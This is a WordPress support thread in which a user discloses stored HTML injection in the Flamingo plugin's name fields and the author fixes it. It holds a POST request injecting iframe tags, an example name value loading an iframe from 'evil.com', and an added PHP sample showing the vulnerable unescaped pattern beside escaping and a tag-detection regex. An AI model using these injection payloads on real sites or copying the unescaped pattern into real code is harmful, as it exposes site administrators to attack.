Title: Code injection
Last modified: August 21, 2016

---

# Code injection

 *  Resolved [n0x00](https://wordpress.org/support/users/n0x00/)
 * (@n0x00)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/)
 * Hey guys, you have code injection on the first and last name values that, when
   viewed in the address book or in the inbound messages, render the code:
 * `_wpcf7=7&_wpcf7_version=3.8.1&_wpcf7_locale=en_US&_wpcf7_unit_tag=wpcf7-f7-p5-o1&_wpnonce=31337&FirstName=Evil%3Ciframe+src%3D%22http%3A%2F%2Fwww.google.com%22%3E&Surname=Dude%3Ciframe+src%3D%22http%3A%2F%2Fwww.google.com%22%3E&AgeRange=18+to+25&Email=evil@dude.com`
 * [https://wordpress.org/plugins/flamingo/](https://wordpress.org/plugins/flamingo/)

Viewing 6 replies - 1 through 6 (of 6 total)

 *  Plugin Author [Takayuki Miyoshi](https://wordpress.org/support/users/takayukister/)
 * (@takayukister)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974137)
 * Can you be more specific? What is it?
 *  Thread Starter [n0x00](https://wordpress.org/support/users/n0x00/)
 * (@n0x00)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974146)
 * It’s code injection; the specifics are in the POST request I submitted above.
 * I’m not sure what you’re having trouble with, mate.
 * [https://www.owasp.org/index.php/Code_Injection](https://www.owasp.org/index.php/Code_Injection)
 * If someone supplies HTML / code in the name fields, when the admin is viewing
   the submissions it will render the user-supplied code.
 * badguy submits his name as ‘MrEvil <iframe src="http://evil.com/">’;
 * when the admin or manager of that plugin reviews the submissions it will treat the
   `<iframe` as legitimate code and render it. If evil.com has malicious payloads
   (Java, JavaScript, Flash, Metasploit, whatever), it will get pushed in via the iframe,
   attacking authenticated users.
 * … do you need a video?
 *  Plugin Author [Takayuki Miyoshi](https://wordpress.org/support/users/takayukister/)
 * (@takayukister)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974201)
 * > the specifics are in the post request I submitted above
 * Do you mean HTTP POST request?
 *  Thread Starter [n0x00](https://wordpress.org/support/users/n0x00/)
 * (@n0x00)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974202)
 * Oh sorry, are there any other types of POST requests?
 * Yes, I mean HTTP POST.
 *  Plugin Author [Takayuki Miyoshi](https://wordpress.org/support/users/takayukister/)
 * (@takayukister)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974216)
 * Thank you very much. There were some fields not escaped properly. Fixed them
   and released v1.1.1.
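What the author's fix addresses, as an added example that is not Flamingo's code: the name values from the reported request rendered into an admin table first unescaped, then escaped. The render functions and the `contains_markup` check are hypothetical; in a WordPress plugin the escaping call would be `esc_html()`, and `htmlspecialchars()` stands in here so the script runs outside WordPress.

```php
<?php
// Added example, not the plugin's own code.
declare(strict_types=1);

// Sample submission: the decoded FirstName/Surname values from the POST body
// reported in this thread (a constructed array, not a real stored record).
$submission = [
    'FirstName' => 'Evil<iframe src="http://www.google.com">',
    'Surname'   => 'Dude<iframe src="http://www.google.com">',
    'Email'     => 'evil@dude.com',
];

// Vulnerable pattern: stored values are concatenated straight into the admin
// page, so any HTML inside them is parsed by the reviewer's browser.
function render_row_unescaped(array $s): string
{
    return '<tr><td>' . $s['FirstName'] . '</td><td>' . $s['Surname'] . '</td></tr>';
}

// Hardened pattern: every untrusted value is HTML-escaped at output time.
// WordPress plugins use esc_html() for text nodes and esc_attr() inside
// attributes; htmlspecialchars() is the plain-PHP equivalent used here.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_row_escaped(array $s): string
{
    return '<tr><td>' . esc($s['FirstName']) . '</td><td>' . esc($s['Surname']) . '</td></tr>';
}

// Simple check a reviewer can run over rendered output: is there still a live
// tag of a kind that can load or execute remote content? (Hypothetical helper.)
function contains_markup(string $html): bool
{
    return (bool) preg_match('/<\s*(iframe|script|img|svg|object|embed)\b/i', $html);
}

echo render_row_unescaped($submission), PHP_EOL;
echo render_row_escaped($submission), PHP_EOL;
var_dump(contains_markup(render_row_unescaped($submission)));
var_dump(contains_markup(render_row_escaped($submission)));
```

The escaped row shows `&lt;iframe ...&gt;` as literal text in the browser, which is the behaviour the v1.1.1 fix restores for the affected fields.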
 *  Thread Starter [n0x00](https://wordpress.org/support/users/n0x00/)
 * (@n0x00)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974217)
 * Wicked! That’s probably the quickest turnaround I’ve seen to date 🙂
 * Good work!
